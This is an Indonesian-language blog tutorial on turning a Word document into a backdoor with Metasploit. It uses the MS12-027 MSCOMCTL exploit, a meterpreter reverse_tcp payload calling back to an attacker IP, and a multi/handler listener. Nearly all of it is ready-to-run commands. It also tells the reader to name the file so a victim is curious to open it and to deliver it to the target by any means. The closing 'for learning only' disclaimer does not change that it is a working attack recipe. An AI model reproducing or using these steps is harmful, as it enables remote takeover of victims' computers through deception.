Exploit Windows Menggunakan Ms.Word dengan Metasploit

Setelah beberapa hari yang lalu saya memberikan tutrial mengenai Cara Exploit Windows Menggunakan PDF dengan Metasploit, nah kali ini saya akan memberikan cara exploit windows dengan Ms.Word.

yups. langsung saja di praktekkan

seperti biasa kita jalankan terlebih dahulu service postgresql dan metasploit, perintahnya;

service posgresql start
service metasploit start

selanjutnya kita buka msfconsole

msfconsole

setelah msfconfole terbuka kita lanjutkan ke langkah pembuatan backdoor (Ms.Word),  perintahnya

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set payload windows/meterpreter/reverse_tcp
set filename TUGAS_JARKOM.doc
set lhost 192.168.1.106
exploit

Keterangan:
use exploit/windows/fileformat/ms12_027_mscomctl_bof --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename TUGAS_JARKOM.doc --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
exploit --> Perintah untuk menghasilkan file PDF (backdoor)
kenapa saya tidak memasukan lport, karena disini saya menggunakan port default metasploit.

setelah backdoor terbuat lalu jalankan perintah exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.106
exploit

sekarang kita ambil backdor di folder /root/.msf4/local/nama_backdor.doc. tekan CTRL+H apabila folder .msf4 tidak terlihat. selanjutnya  tinggal kirim backdoor (Ms.Word) ke target. terserah kalian bagaimana caranya :D

Setelah file backdoor buka korban, maka sesi meterpreter akan terbuka. itu berarti exploit kita suksess :D

Ini contohnya 

Sekian tutorial mengenai Cara Exploit Windows Menggunakan Ms.Word dengan Metasploit, semoga bisa bermanfaat, ini hanya sebuah pembelajaran, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya. Terimakasih